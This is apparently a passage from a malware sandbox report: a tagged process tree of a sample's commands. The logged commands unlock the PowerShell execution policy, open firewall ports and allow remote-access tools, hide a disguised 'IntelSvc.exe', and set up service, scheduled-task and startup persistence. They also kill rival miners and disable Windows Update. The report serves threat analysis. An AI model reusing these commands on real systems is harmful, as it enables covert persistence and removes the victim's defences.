                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                            PID:2476
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -ArgumentList 'Set-ExecutionPolicy Unrestricted' -Verb RunAs -windowstyle hidden"
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                            PID:2652
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe" Set-ExecutionPolicy Unrestricted
                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                              PID:2792
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" /f
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                              PID:2660
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Unrestricted" /f /reg:64
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:1652
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Unrestricted" /f
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                PID:2852
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 443" dir=in action=allow protocol=TCP localport=443
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                PID:2960
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 443" new enable=yes
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                PID:2948
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 80" dir=in action=allow protocol=TCP localport=80
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                PID:1504
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 80" new enable=yes
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                PID:892
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 6568" dir=in action=allow protocol=TCP localport=6568
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                PID:2024
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 6568" new enable=yes
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                PID:1480
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 50001" dir=in action=allow protocol=TCP localport=50001
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                PID:2136
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 50001" new enable=yes
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                PID:1824
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall add rule name="AnyDesk1" dir=in action=allow program="C:\Program Files (x86)\AnyDesk\AnyDesk.exe" enable=yes
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                PID:2180
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall add rule name="AnyDesk2" dir=in action=allow program="C:\Program Files\AnyDesk\AnyDesk.exe" enable=yes
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                PID:2176
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall add rule name="AnyDesk3" dir=in action=allow program="C:\ProgramData\AnyDesk\AnyDesk.exe" enable=yes
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                PID:1144
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall add rule name="TeamViewer1" dir=in action=allow program="C:\Program Files (x86)\TeamViewer\TeamViewer.exe" enable=yes
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                PID:1568
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall add rule name="TeamViewer2" dir=in action=allow program="C:\Program Files\TeamViewer\TeamViewer.exe" enable=yes
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                PID:2932
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall add rule name="TeamViewer3" dir=in action=allow program="C:\ProgramData\TeamViewer\TeamViewer.exe" enable=yes
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                PID:1744
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel1" dir=in action=allow program="C:\ProgramData\IntelSvc.exe" enable=yes
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                PID:1348
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel2" dir=in action=allow program="C:\Users\Public\IntelSvc.exe" enable=yes
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                PID:784
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel3" dir=in action=allow program="C:\Users\Admin\AppData\Local\OneDrive\fontdrvhots.exe" enable=yes
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                PID:1944
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel4" dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\tv_x86.exe" enable=yes
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                PID:716
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\USOShared\*.*"
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                PID:444
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                PID:2560
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\ProgramData\IntelSvc.exe' -ArgumentList '-install_service' -verb runas -windowstyle hidden"
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                PID:2148
                                                                                                                                                                                                                                                                • C:\ProgramData\IntelSvc.exe
                                                                                                                                                                                                                                                                  "C:\ProgramData\IntelSvc.exe" -install_service
                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  • Writes to the Master Boot Record (MBR)
                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                  PID:700
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                C:\Windows\System32\ping.exe 192.168.1.1 -n 4
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                PID:2888
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Intel(R) Utiliti" /v "ImagePath" /t "REG_EXPAND_SZ" /d "\"C:\ProgramData\IntelSvc.exe\" w -sid 1" /f
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Sets service image path in registry
                                                                                                                                                                                                                                                                PID:2648
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Intel(R) Utiliti" /v "ImagePath" /t "REG_EXPAND_SZ" /d "\"C:\ProgramData\IntelSvc.exe\" w -sid 1" /f /reg:64
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Sets service image path in registry
                                                                                                                                                                                                                                                                PID:264
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\IntelSvc.exe"
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                PID:2316
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\IntelSvc.exe"
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                PID:1036
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\schtasks.exe /create /sc minute /mo 58 /tn "OneDrv" /tr "\"C:\Users\Admin\AppData\Local\OneDrive\fontdrvhots.exe\"" /f
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                PID:2992
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe "$s=(New-Object -COM WScript.Shell).CreateShortcut('"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TeamViewer_Service.lnk"');$s.TargetPath='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.IconLocation='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.WorkingDirectory='"C:\Users\Admin\AppData\Local\Temp"';$s.WindowStyle=7;$s.Save()"
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                PID:340
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe "$s=(New-Object -COM WScript.Shell).CreateShortcut('"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TeamViewer_Service.lnk"');$s.TargetPath='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.IconLocation='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.WorkingDirectory='"C:\Users\Admin\AppData\Local\Temp"';$s.WindowStyle=7;$s.Save()"
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                PID:2960
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                PID:2352
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo "x86" 2>NUL"
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                  PID:1260
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                                                                                  C:\Windows\System32\find.exe /i "64"
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                    PID:776
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    C:\Windows\System32\reg.exe Query "HKLM\Hardware\Description\System\CentralProcessor\0"
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                    PID:1028
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                                                                                    C:\Windows\System32\find.exe /i "x86"
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                      PID:1112
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                      C:\Windows\System32\tasklist.exe /FI "IMAGENAME eq Sophos.exe"
                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                      PID:1996
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                      C:\Windows\System32\findstr.exe /i /c:"Sophos"
                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                        PID:1984
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                        C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                                        PID:2360
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "& {Get-Content -Path "'C:\Users\Admin\AppData\Local\Temp\Intxt1.ps1'" | Out-File -FilePath "'C:\Users\Admin\AppData\Local\Temp\Intxt2.ps1'" -Encoding ascii}" -Wait
                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                        PID:2172
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Intxt2.ps1"
                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                        PID:3048
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                        C:\Windows\System32\findstr.exe /i /b /v /c:"Name" /c:"----" "C:\Users\Admin\AppData\Local\Temp\Intxt1.txt"
                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                          PID:2544
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo "Get-WmiObject" 2>NUL"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                            PID:3068
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                            C:\Windows\System32\findstr.exe /i /c:"#"
                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                              PID:2184
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\Windows\System32\wbem\WMIC.exe process where "name like '%Get-WmiObject%'" get ExecutablePath,status /format:csv
                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                              PID:1740
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                C:\Windows\System32\wbem\WMIC.exe process where "name like '%Get-WmiObject%'" get ExecutablePath,status /format:csv
                                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                                  PID:344
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c DIR /s "C:\Get-WmiObject*.exe" /B /O:D
                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                  PID:616
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                  C:\Windows\System32\wbem\WMIC.exe process where "name like '%RtkAudio%'" Call Terminate
                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                  • Kills process with WMI
                                                                                                                                                                                                                                                                                  PID:564
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                  C:\Windows\System32\wbem\WMIC.exe process where "name like '%Xmrig%'" Call Terminate
                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                  • Kills process with WMI
                                                                                                                                                                                                                                                                                  PID:2292
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /f /reg:64
                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                    PID:2284
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d "1" /f /reg:64
                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                      PID:2268
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\netsh.exe stop "Windows Update"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                                      PID:1732
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\SC.exe config "Windows Update" start= disabled
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                      PID:1700
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\netsh.exe stop "Service Network"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                      PID:1308
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\netsh.exe stop "ServiceNetwork"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                                      PID:2820
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\netsh.exe stop "App System"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                                      PID:588
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\netsh.exe stop "System"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                                      PID:1624
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\netsh.exe stop "loadhost Service"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                                      PID:2452
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\netsh.exe stop "loadhost Dhcp"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                                      PID:2724
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\netsh.exe stop "loadhostDhcp"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                                      PID:2476
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\SC.exe DELETE "Service Network"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                      PID:2768
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\SC.exe DELETE "ServiceNetwork"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                      PID:1012
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\SC.exe DELETE "App System"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                      PID:2888
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\SC.exe DELETE "System"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                      PID:2996
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\SC.exe DELETE "loadhost Service"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                      PID:2316
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\SC.exe DELETE "loadhost Dhcp"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                      PID:2728
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\SC.exe DELETE "loadhostDhcp"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                      PID:2848
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\wbem\WMIC.exe service where "name like 'App System'" call stopservice
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                        PID:2864
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                        C:\Windows\System32\wbem\WMIC.exe service where "name like 'System'" call stopservice
                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                          PID:1976
